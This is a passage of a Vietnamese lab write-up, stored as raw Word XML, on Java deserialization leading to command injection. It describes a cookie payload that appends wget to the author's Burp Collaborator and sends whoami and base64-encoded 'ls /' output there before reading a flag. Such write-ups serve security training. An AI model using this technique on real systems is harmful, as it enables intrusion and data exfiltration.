        <w:t xml:space="preserve">từ dữ liệu không tin cậy, toàn bộ lệnh trong readObject sẽ được thực </w:t>
      </w:r>
      <w:r w:rsidR="00DD7443">
        <w:t>hiện</w:t>
      </w:r>
      <w:r w:rsidR="00531328" w:rsidRPr="00531328">
        <w:t xml:space="preserve"> ngay lập tức</w:t>
      </w:r>
      <w:r w:rsidR="00531328">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F5089">
        <w:t>giúp thực thi câu lệnh ping với đầu vào không được kiểm soát gây ra lỗ hổng Command injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503D8F48" w14:textId="319145B2" w:rsidR="009F108F" w:rsidRDefault="009F108F" w:rsidP="009F108F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF619D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">* Ý tưởng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AEA17C" w14:textId="60F845C3" w:rsidR="009F108F" w:rsidRPr="008A4ED5" w:rsidRDefault="001D4A7D" w:rsidP="009F108F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001D4A7D">
        <w:t>Thực hiện bằng cách tạo một payload chứa một instance của lớp MyHTTPClient với thuộc tính host được thiết lập phù hợp. Payload này sau khi được tuần tự hóa và mã hóa Base64 sẽ được đưa vào cookie user. Khi ứng dụng tiến hành deserialize dữ liệu cookie, Java sẽ khôi phục đúng class thực tế (MyHTTPClient) và tự động gọi các hành vi khôi phục trạng thái</w:t>
      </w:r>
      <w:r w:rsidR="009F108F" w:rsidRPr="008A4ED5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BF34EA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF34EA">
        <w:t xml:space="preserve">Giúp thực hiện đoạn code thực thi tiến trình hệ thống ping tới host được truyền </w:t>
      </w:r>
      <w:r w:rsidR="00DF67ED">
        <w:t xml:space="preserve">vào một cách không an toàn từ người </w:t>
      </w:r>
      <w:r w:rsidR="00FB7823">
        <w:t>dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A75F435" w14:textId="77777777" w:rsidR="009F108F" w:rsidRPr="00184ED1" w:rsidRDefault="009F108F" w:rsidP="009F108F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184ED1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>* Khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594866BF" w14:textId="2347B47E" w:rsidR="0092004F" w:rsidRPr="00323905" w:rsidRDefault="00323905" w:rsidP="00EB7BAD">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Thực hiện tương tự bài trước bằng cách tạo một mã serialize rồi mã hóa bằng base64 để thực hiện in lên giao diện </w:t>
      </w:r>
      <w:r w:rsidR="004877B2">
        <w:t>web. Ở đây mình sẽ tạo một đối tượng</w:t>
      </w:r>
      <w:r w:rsidR="00E50515">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB7823">
        <w:t xml:space="preserve">MyHTTPClient với giá trị </w:t>
      </w:r>
      <w:r w:rsidR="008F6138">
        <w:t xml:space="preserve">host </w:t>
      </w:r>
      <w:r w:rsidR="00FB7823">
        <w:t xml:space="preserve">khởi tạo là 8.8.8.8 (ip của google) để thực hiện ping đến nó và </w:t>
      </w:r>
      <w:r w:rsidR="00DD7443">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00FB7823">
        <w:t xml:space="preserve">au đó là ký tự ; để ngắt </w:t>
      </w:r>
      <w:r w:rsidR="00EB7BAD">
        <w:t xml:space="preserve">chuỗi và thực hiện câu lệnh command tiếp theo là wget </w:t>
      </w:r>
      <w:r w:rsidR="00A23C67">
        <w:t>với url là địa chỉ của burp collaborator của mình nhằm lấy được gói tin HTTP từ hệ thống bài lab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124291EC" w14:textId="4B209381" w:rsidR="001F7BC3" w:rsidRDefault="001F7BC3">
      <w:r w:rsidRPr="001F7BC3">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BC78CA3" wp14:editId="35A81423">
            <wp:extent cx="5731510" cy="1111885"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="69255090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50900" name="Picture 1" descr="A computer screen shot of a black screen&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1111885"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EEE71A" w14:textId="7C0B8B78" w:rsidR="008F6138" w:rsidRDefault="002C283F">
      <w:r>
        <w:t>Khởi chạy code và truy cập vào giao diện web để lấy mã base64:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C283F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E54BADD" wp14:editId="22AFFAA0">
            <wp:extent cx="5731510" cy="744220"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="676612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12072" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="744220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF9717B" w14:textId="4EE6AA7B" w:rsidR="002C283F" w:rsidRPr="008F6138" w:rsidRDefault="00C532DB">
      <w:r>
        <w:t>Copy mã base64 vừa lấy được và thay thế cookie của bài lab bằng mã này:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633C248D" w14:textId="4033D344" w:rsidR="009A037B" w:rsidRDefault="009A037B">
      <w:r w:rsidRPr="009A037B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F3C9C91" wp14:editId="10D5A2C7">
            <wp:extent cx="5731510" cy="648335"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="53853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33640" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="648335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF6D1EC" w14:textId="6592A1F7" w:rsidR="00C532DB" w:rsidRPr="00C532DB" w:rsidRDefault="00C532DB">
      <w:r>
        <w:t xml:space="preserve">Kết quả trang web trả về Please don’t hack </w:t>
      </w:r>
      <w:r w:rsidR="00E11ECC">
        <w:t xml:space="preserve">me, điều đó cho thấy payload có thể đã bị chặn, theo như code đoạn thông báo trên chỉ trả về khi có lỗi xảy ra, vì </w:t>
      </w:r>
      <w:r w:rsidR="00F233BC">
        <w:t>vậy</w:t>
      </w:r>
      <w:r w:rsidR="00E11ECC">
        <w:t xml:space="preserve"> kiểm tra log của docker để xem lí do tại sao:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7D821F" w14:textId="1E65F926" w:rsidR="0076592C" w:rsidRDefault="0076592C">
      <w:r w:rsidRPr="0076592C">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4913F1E2" wp14:editId="53CE3D30">
            <wp:extent cx="5731510" cy="223520"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="11426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9296" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="223520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D6CD7E" w14:textId="00B478D8" w:rsidR="00F233BC" w:rsidRPr="00F233BC" w:rsidRDefault="00F233BC" w:rsidP="00EC3383">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kết quả </w:t>
      </w:r>
      <w:r w:rsidR="00FE001C">
        <w:t xml:space="preserve">log cho biết </w:t>
      </w:r>
      <w:r w:rsidR="004D0AF8">
        <w:t xml:space="preserve">rằng </w:t>
      </w:r>
      <w:r w:rsidR="004D0AF8" w:rsidRPr="004D0AF8">
        <w:t xml:space="preserve">MyHTTPClient không thể ép kiểu thành </w:t>
      </w:r>
      <w:r w:rsidR="004D0AF8">
        <w:t xml:space="preserve">User. Tuy nhiên, </w:t>
      </w:r>
      <w:r w:rsidR="002A6FD7">
        <w:t xml:space="preserve">khi mở Burp </w:t>
      </w:r>
      <w:r w:rsidR="00EC3383">
        <w:t>Collaborator thì vẫn có request được gửi từ hệ thống bài lab gửi về:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D9D718" w14:textId="334F1574" w:rsidR="00CF4C45" w:rsidRDefault="00CF4C45">
      <w:r w:rsidRPr="00CF4C45">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BF6D5DC" wp14:editId="06CF1575">
            <wp:extent cx="5731510" cy="970915"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="12891867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86701" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="970915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B83500D" w14:textId="66EF7471" w:rsidR="00EC3383" w:rsidRDefault="00EC3383" w:rsidP="0005206C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Lý do xảy ra điều này là </w:t>
      </w:r>
      <w:r w:rsidR="004768F5" w:rsidRPr="004768F5">
        <w:t>hàm deserializeFromBase64() luôn chạy</w:t>
      </w:r>
      <w:r w:rsidR="004768F5">
        <w:t xml:space="preserve"> trước khi ép kiểu, tức là deserialize đã diễn ra và chuyển đoạn base64 về dạng Object. Điều này làm </w:t>
      </w:r>
      <w:r w:rsidR="00DD7443">
        <w:t>cho readObject được thực thi với toàn bộ câu lệnh command ở bên trong.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A95B17A" w14:textId="4FE0A899" w:rsidR="0005206C" w:rsidRPr="00EC3383" w:rsidRDefault="0005206C" w:rsidP="0005206C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Tiếp đó thực hiện chèn thêm dấu backtich và lệnh whoami để đưa kết quả lệnh whoami đến</w:t>
      </w:r>
      <w:r w:rsidR="00D02FE5">
        <w:t xml:space="preserve"> máy chủ burp collaborator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012474E0" w14:textId="1A13B5BD" w:rsidR="00146709" w:rsidRDefault="0005206C">
      <w:r w:rsidRPr="00146709">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="012FDE5E" wp14:editId="14AB17B0">
            <wp:extent cx="5731510" cy="1148080"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="199357374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73747" name="Picture 1" descr="A computer screen shot of text&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1148080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34065D68" w14:textId="46F31CFD" w:rsidR="00D02FE5" w:rsidRPr="00EC3383" w:rsidRDefault="00D02FE5">
      <w:r>
        <w:t>Thu được kết quả của whoami là root:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33463128" w14:textId="193D3534" w:rsidR="00146709" w:rsidRDefault="00146709">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00146709">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C2ED34C" wp14:editId="3BD29571">
            <wp:extent cx="5731510" cy="1184910"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="262977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77673" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1184910"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEBB748" w14:textId="54F02817" w:rsidR="00146709" w:rsidRPr="00D02FE5" w:rsidRDefault="00D02FE5" w:rsidP="00D02FE5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sau</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> đó chuyển câu lệnh whoami thành ls / | base64 để mã hóa kết quả ls và gửi qua máy chủ của mình:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA53162" w14:textId="387B996A" w:rsidR="001A4730" w:rsidRDefault="001A4730">
      <w:r w:rsidRPr="001A4730">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78B952C4" wp14:editId="63B8B471">
            <wp:extent cx="5731510" cy="1129030"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1811790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90076" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1129030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="474CD12E" w14:textId="118CFA0D" w:rsidR="00D02FE5" w:rsidRPr="00D02FE5" w:rsidRDefault="00D02FE5" w:rsidP="00C06ACA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sau đó </w:t>
      </w:r>
      <w:r w:rsidR="00C06ACA">
        <w:t>giải mã đoạn base64 được gửi tới và lấy được toàn bộ danh sách tệp thư mục bên trong /:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5890D65B" w14:textId="2DACE9FA" w:rsidR="001A4730" w:rsidRDefault="001A4730">
      <w:r w:rsidRPr="001A4730">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D98D810" wp14:editId="7B24D8BC">
            <wp:extent cx="5731510" cy="1579245"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="486646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46281" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1579245"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="341E97D7" w14:textId="77777777" w:rsidR="00C06ACA" w:rsidRDefault="00C06ACA">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D97F658" w14:textId="446A1118" w:rsidR="00C06ACA" w:rsidRPr="00C06ACA" w:rsidRDefault="00C06ACA">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Cuối cùng là thực hiện đọc flie flag để kết thúc bài:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4776C3E1" w14:textId="6ECA5982" w:rsidR="00146709" w:rsidRPr="000D2311" w:rsidRDefault="00392F91">
      <w:r w:rsidRPr="00392F91">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63D8CC75" wp14:editId="1BFF809E">
            <wp:extent cx="5731510" cy="1628775"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="1308347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47278" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1628775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E79E2C" w14:textId="77777777" w:rsidR="007D00FC" w:rsidRDefault="007D00FC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A4D56D" w14:textId="4113BB65" w:rsidR="00146709" w:rsidRDefault="000D2311">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Mục tiêu </w:t>
      </w:r>
      <w:r w:rsidRPr="002146CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00166213">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EE63F9" w14:textId="0F4AFDED" w:rsidR="007D00FC" w:rsidRDefault="007D00FC">
      <w:r w:rsidRPr="00A4464E">
        <w:t>Thông</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tin source code xử lý chính được cung cấp:</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41729F" w:rsidRPr="0041729F" w14:paraId="6AEF74D3" w14:textId="77777777" w:rsidTr="00071482">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B02F134" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="00067902">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AEC534C" w14:textId="73C162A1" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="00067902">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07446ABF" w14:textId="5CF19F7D" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="00067902">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t>3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66BFD6A9" w14:textId="3C8078EB" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="00067902">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t>4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="689AF0DA" w14:textId="27ABA88A" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="00067902">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t>5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B16C4C6" w14:textId="7F6D6F73" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="00067902">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t>6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="538790C8" w14:textId="24598D42" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="00067902">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t>7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12CA32FC" w14:textId="1A8CE7D5" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="00067902">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t>8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7212975B" w14:textId="2AA69B77" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="00067902">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t>9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E456589" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="00067902">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57550CC3" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74D7866E" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B4D11E4" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26B408E8" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63C68525" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51EEC69D" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0041729F">
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50465DA2" w14:textId="77777777" w:rsidR="0041729F" w:rsidRPr="0041729F" w:rsidRDefault="0041729F" w:rsidP="0041729F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
